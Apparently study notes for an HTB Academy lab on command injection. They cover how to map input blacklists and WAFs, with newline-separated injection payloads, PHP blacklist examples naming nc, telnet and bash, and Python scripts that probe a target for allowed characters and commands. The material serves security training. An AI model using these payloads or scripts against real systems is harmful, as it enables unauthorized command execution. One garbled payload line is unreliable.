Filter Identification

🛡️ Defense Detection: Systematic identification of input filters, blacklisted characters, and WAF protection mechanisms

Overview

Even when developers attempt to secure web applications against injections, implementations may still be exploitable if not properly coded. Common mitigation techniques include:

1. Blacklisted characters and words on the back-end

2. Input validation filters at the application level

3. Web Application Firewalls (WAFs) with broader detection scope

4. Pattern-based detection systems

This section demonstrates how to identify what is being blocked and develop systematic bypass strategies.

Focus: Methodical filter detection and characterization to develop targeted bypass techniques.

---

Filter/WAF Detection

Initial Detection Signs

Scenario: Enhanced Host Checker application with security mitigations

Previous Working Payload:

127.0.0.1; whoami

Current Response:

Invalid input

Detection Indicators:

Application-Level Filtering:

• Error message appears in normal application output

• Standard web application styling maintained

• Response includes original form structure

• Error displayed where command output would appear

WAF-Level Filtering:

• Different error page format

• May include IP address and request details

• Generic security-focused error message

• Response may lack application-specific styling

Response Analysis

Application Filter Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8

<div class="host-checker">
    <form>
        <input type="text" value="127.0.0.1; whoami">
        <button>Check</button>
    </form>
    <div class="output">
        Invalid input
    </div>
</div>

WAF Response (Example):

HTTP/1.1 403 Forbidden
Content-Type: text/html

<html>
<head><title>Access Denied</title></head>
<body>
    <h1>Request Blocked</h1>
    <p>Your request was blocked by security policy.</p>
    <p>Client IP: 192.168.1.100</p>
    <p>Request ID: ABC123</p>
</body>
</html>

---

Blacklisted Characters

Common Implementation

Typical PHP Blacklist Filter:

$blacklist = ['&', '|', ';', '&&', '||', 'sh', 'bash', 'nc', 'telnet', ...];

foreach ($blacklist as $character) {
    if (strpos($_POST['ip'], $character) !== false) {
        echo "Invalid input";
        exit();
    }
}

Filter Characteristics:

• String-based detection - Searches for exact character matches

• Case-sensitive or case-insensitive matching

• Partial matches - Any occurrence triggers block

• Word boundaries - May or may not respect word boundaries

Filter Logic Variations

Simple Character Blacklist:

// Basic character filtering
if (strpos($input, ';') !== false || strpos($input, '&') !== false) {
    die("Invalid input");
}

Regex-Based Filtering:

// Pattern-based filtering
if (preg_match('/[;&|`$()]/i', $input)) {
    die("Invalid input");
}

Word-Based Filtering:

// Command blacklisting
$blocked_commands = ['whoami', 'cat', 'ls', 'nc', 'bash'];
foreach ($blocked_commands as $cmd) {
    if (stripos($input, $cmd) !== false) {
        die("Invalid input");
    }
}

Combined Filtering:

// Multi-layer filtering
function isBlocked($input) {
    $char_blacklist = [';', '&', '|', '`', '$'];
    $cmd_blacklist = ['whoami', 'cat', 'ls', 'sh'];
    
    // Check characters
    foreach ($char_blacklist as $char) {
        if (strpos($input, $char) !== false) return true;
    }
    
    // Check commands
    foreach ($cmd_blacklist as $cmd) {
        if (stripos($input, $cmd) !== false) return true;
    }
    
    return false;
}

---

Systematic Filter Identification

Step-by-Step Testing Methodology

Step 1: Baseline Verification

# Confirm normal functionality still works
ip=127.0.0.1

# Expected: Normal ping output
# Result: ✅ Working - baseline established

Step 2: Individual Character Testing

Test each injection operator separately:

Semicolon Test:

ip=127.0.0.1%3b

Expected Result: Invalid input (✗ Blocked)

AND Operator Test:

ip=127.0.0.1%26%26

Expected Result: Invalid input (✗ Blocked)

OR Operator Test:

ip=127.0.0.1%7c%7c

Expected Result: Invalid input (✗ Blocked)

Pipe Test:

ip=127.0.0.1%7c

Expected Result: Invalid input (✗ Blocked)

Background Test:

ip=127.0.0.1%26

Expected Result: Invalid input (✗ Blocked)

New Line Test:

ip=127.0.0.1%0a

Expected Result: Normal ping output (✅ Not blocked!)

Character-by-Character Analysis

Isolate each special character:

# Test individual characters that might be filtered
;    → %3b     → "Invalid input" (blocked)
&    → %26     → "Invalid input" (blocked)  
|    → %7c     → "Invalid input" (blocked)
`    → %60     → "Invalid input" (blocked)
$    → %24     → "Invalid input" (blocked)
(    → %28     → Normal response (allowed)
)    → %29     → Normal response (allowed)
\n   → %0a     → Normal response (allowed) ⭐
\r   → %0d     → Test needed
\t   → %09     → Test needed

HTB Academy Lab Results

Question: Which of (new-line, &, |) is not blacklisted by the web application?

Testing Process:

New Line Test:

ip=127.0.0.1%0a
# Result: Normal ping output - NOT BLOCKED ✅

Ampersand Test:

ip=127.0.0.1%26  
# Result: "Invalid input" - BLOCKED ✗

Pipe Test:

ip=127.0.0.1%7c
# Result: "Invalid input" - BLOCKED ✗

Answer: new-line (\n / %0a) is not blacklisted by the web application.

---

Advanced Filter Detection

Testing Alternative Characters

Extended Character Set:

# Test various encodings and alternatives
\n    → %0a     → newline (often allowed)
\r    → %0d     → carriage return  
\r\n  → %0d%0a  → Windows line ending
\t    → %09     → tab character
\v    → %0b     → vertical tab
\f    → %0c     → form feed
space → %20     → regular space

Unicode Alternatives:

# Unicode variations (if application supports)
;     → %3b     → standard semicolon
;     → %uff1b  → fullwidth semicolon
&     → %26     → standard ampersand  
＆    → %ef%bc%86 → fullwidth ampersand

Command Detection Testing

After identifying allowed separators, test commands:

Basic Commands:

# Using newline separator
ip=127.0.0.1%0awhoami
ip=127.0.0.1%0aid  
ip=127.0.0.1%0alstp=127.0.0.1%0acat

Alternative Commands:

# If basic commands are blocked, try alternatives
whoami   → w       → /usr/bin/whoami
id       → /usr/bin/id
ls       → dir (Windows) → /bin/ls
cat      → type (Windows) → more → less

Payload Structure Analysis

Test different payload positions:

Prefix Injection:

ip=whoami%0a127.0.0.1

Suffix Injection:

ip=127.0.0.1%0awhoami

Middle Injection:

ip=127%0awhoami%0a.0.0.1

Multiple Commands:

ip=127.0.0.1%0awhoami%0aid%0als

---

Filter Bypass Strategy Development

Systematic Approach

Phase 1: Character Mapping

# Create character allowlist/blocklist
✅ Allowed: \n (\r ?) \t (?) ( ) space numbers letters . 
✗ Blocked: ; & | ` $ && || 
? Unknown: \r \t \v \f unicode_alternatives

Phase 2: Command Testing

# Test command categories
✅ Basic: whoami id ls cat
✗ Network: nc netcat telnet  
✗ Shells: sh bash zsh
? File: head tail grep awk

Phase 3: Payload Optimization

# Build working payload using allowed characters
Base: 127.0.0.1%0awhoami
Extended: 127.0.0.1%0awhoami%0aid
Complex: 127.0.0.1%0a/usr/bin/whoami%0a/usr/bin/id

Documentation Template

Filter Analysis Report:

## Target: Host Checker Application

### Allowed Characters:
- Alphanumeric: a-z A-Z 0-9 ✅
- Special: . space ( ) ✅  
- Separators: \n (\r?) ✅
- Encoding: URL encoding ✅

### Blocked Characters:
- Operators: ; & | && || ✗
- Substitution: ` $ $() ✗
- [Additional testing needed for: \r \t \v \f]

### Allowed Commands:
- System info: whoami id ✅
- File operations: [testing needed]
- Network: [testing needed]

### Working Payloads:
- Basic: 127.0.0.1%0awhoami
- Multi-command: 127.0.0.1%0awhoami%0aid

---

Common Filter Patterns

Application-Level Filters

Simple Blacklist:

• Blocks common injection characters

• Case-sensitive string matching

• No context awareness

• Easy to bypass with alternatives

Advanced Application Filters:

• Regex pattern matching

• Command word detection

• Context-aware filtering

• Parameter validation

WAF-Level Filters

Signature-Based:

• Known attack pattern detection

• Multi-parameter correlation

• HTTP header analysis

• Rate limiting integration

Behavioral Analysis:

• Anomaly detection

• Machine learning models

• Statistical analysis

• Dynamic rule adaptation

Hybrid Approaches

Multi-Layer Defense:

1. Client-side validation (easily bypassed)

2. Application input filters (character/command blocking)

3. WAF protection (pattern-based detection)

4. System-level controls (sandboxing, permissions)

---

Testing Automation

Systematic Character Testing Script

Python Filter Detector:

import requests
import urllib.parse

def test_character_filter(base_url, param_name, base_value):
    """Test individual characters for filtering"""
    
    test_chars = [';', '&', '|', '`', '$', '(', ')', '\n', '\r', '\t']
    results = {}
    
    for char in test_chars:
        # Test character individually
        payload = base_value + urllib.parse.quote(char)
        
        response = requests.post(base_url, data={param_name: payload})
        
        if "Invalid input" in response.text:
            results[char] = "BLOCKED"
        elif "ping" in response.text.lower():
            results[char] = "ALLOWED"
        else:
            results[char] = "UNKNOWN"
    
    return results

# Usage
results = test_character_filter(
    "http://target.com/check.php", 
    "ip", 
    "127.0.0.1"
)

for char, status in results.items():
    print(f"Character '{char}' (\\x{ord(char):02x}): {status}")

Command Testing Automation

Command Enumeration:

def test_commands(base_url, param_name, separator):
    """Test common commands using identified separator"""
    
    commands = ['whoami', 'id', 'ls', 'cat', 'pwd', 'uname']
    base_payload = "127.0.0.1"
    
    for cmd in commands:
        payload = base_payload + separator + cmd
        encoded_payload = urllib.parse.quote(payload, safe='')
        
        response = requests.post(base_url, data={param_name: encoded_payload})
        
        if "Invalid input" in response.text:
            print(f"Command '{cmd}': BLOCKED")
        elif cmd in response.text or len(response.text) > 200:
            print(f"Command '{cmd}': ALLOWED")
        else:
            print(f"Command '{cmd}': UNKNOWN")

---

Key Takeaways

Filter Identification Best Practices

1. Systematic Testing:

• Start with individual characters

• Test all injection operators

• Document allowed/blocked patterns

• Build comprehensive filter map

2. Incremental Complexity:

• Begin with simple payloads

• Gradually increase complexity

• Test command combinations

• Validate bypass techniques

3. Documentation:

• Maintain detailed filter analysis

• Track working payloads

• Note environmental constraints

• Plan bypass strategies

Success Indicators

✅ Effective Filter Mapping:

• Clear allowed/blocked character list

• Working injection operator identified

• Command execution confirmed

• Bypass strategy developed

🔍 Further Investigation Needed:

• Mixed/inconsistent responses

• Partial command execution

• Timing-based differences

• Context-dependent filtering

This systematic approach to filter identification provides the foundation for developing effective bypass techniques and ensures comprehensive understanding of the target application's security mechanisms.